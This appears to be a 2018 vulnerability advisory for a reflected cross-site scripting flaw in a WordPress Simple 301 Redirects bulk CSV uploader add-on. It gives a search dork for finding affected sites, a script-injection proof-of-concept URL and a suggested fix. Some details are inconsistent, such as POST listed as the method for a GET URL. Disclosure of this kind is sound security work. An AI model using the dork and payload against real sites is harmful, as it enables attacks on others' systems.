[+] Exploit Title ; Wordpres Simple 301 Redirects - Addon - Bulk CSV Uploader plugin Cross Site Scripting Vulnerability [+] Date : 2018-07-04 [+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS [+] Vendor HomePage : https://wordpress.org/plugins/simple-301-redirects-addon-bulk-uploader/ [+] Dork : inurl:/wp-content/plugins/simple-301-redirects-addon-bulk-uploader/ [+] Version : 1.2.3 [+] Tested On : windows 10 - Deepin Os [+] Contact : https://telegram.me/WebServer [+] My Site : 0P3N3R .IR [+] Description : [!] This is an ADDON plugin to give further functionality to the plugin Simple 301 Redirects plugin. Simple 301 Redirects – Addon – Bulk Uploader adds an extra section to the settings tab to upload a CSV of old and new URL’s to input into the Simple 301 Redirects plugin. An example CSV is bundled in with the plugin to get you going quickly. The plugin checks for duplicate old URLs and alerts you of these in the summary after your CSV has been processed. [+] Poc : [!] http://localhost/wp/wp-content/plugins/simple-301-redirects-addon-bulk-uploader/includes/admin-notices.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E [+] Vulnerable Source : [!] if( defined('DOING_AJAX') && DOING_AJAX ) { add_action('wp_ajax_' . $this->prefix . '_dismiss_suggestions', array( &$this, 'dismiss_suggestions' )); // Admin area (except install or activate plugins page) } elseif( !in_array(basename($_SERVER['PHP_SELF']), array( 'plugins.php', 'plugin-install.php', 'update.php' )) ) { [+] Security Level : [!] High [+] Exploitation Technique: [!] Remote [+] Request Method : [!] POST [+] Vulnerability Files : [!] admin-notices.php [+] Fix : [!] Remove PHP_SELF [+] We Are : [+] 0P3N3R [+] Ebrahim_Vaker